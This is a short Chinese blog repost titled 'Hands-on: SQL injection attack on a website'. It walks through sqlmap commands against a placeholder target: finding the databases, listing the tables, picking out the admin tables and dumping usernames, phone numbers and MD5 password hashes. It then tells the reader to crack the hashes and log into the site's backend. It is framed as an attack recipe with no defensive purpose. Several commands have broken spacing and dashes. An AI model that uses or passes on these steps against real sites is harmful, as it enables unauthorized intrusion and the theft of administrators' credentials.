vlambda博客
学习文章列表

实战|SQL注入攻击网站


实战|SQL注入攻击网站
实战|SQL注入攻击网站
实战|SQL注入攻击网站
实战|SQL注入攻击网站
实战|SQL注入攻击网站

SQL注入

实战|SQL注入攻击网站
实战|SQL注入攻击网站
实战|SQL注入攻击网站
实战|SQL注入攻击网站
实战|SQL注入攻击网站
Access数据库攻击




SQL数据库注入

一:获取数据库类型

sqlmap -u http://xxx.com –dbs

实战|SQL注入攻击网站

获得的信息:linux服务器系统为cenos 5.10

Apacher php 的版本 数据库类型为sql

二,获取数据库中的数据库

sqlmap -u http:xxx.com --dbms mysql--level 3 –dbs

实战|SQL注入攻击网站

OK,当前数据库中有两个数据库,目测sq_kffc200为当前网站的系统!(做过网站都知道的)

三,

从当前数据库中获取表段

sqlmap -uhttp://www.xxx.com --dbmsmysql --level 3 -D sq_kyfc200 –tables

实战|SQL注入攻击网站

Ok 我们可以看到有很多表头 怎么办?

没事我们找关键字(含有admin开头的全部搞上去!)

四:获取admin表中的字段

sqlmap -u http://www.xxx.com--dbms mysql --level 3 -D sq_kyfc200 -T "boc_admin_user,boc_admin_user,ky_admin"–columns

实战|SQL注入攻击网站

获取到的表段:还是关键字password username

五,获取表和字中的密码:

sqlmap -uhttp://www.xxx.com --dbms mysql--level 3 -D sq_kyfc200 -T "boc_admin_user,boc_admin_user,ky_admin" -C"login_count,password,qq,tel" –dump

实战|SQL注入攻击网站

OK 获得MD5加密的密文 解密登录后台

获取更多原创教程 扫码关注即可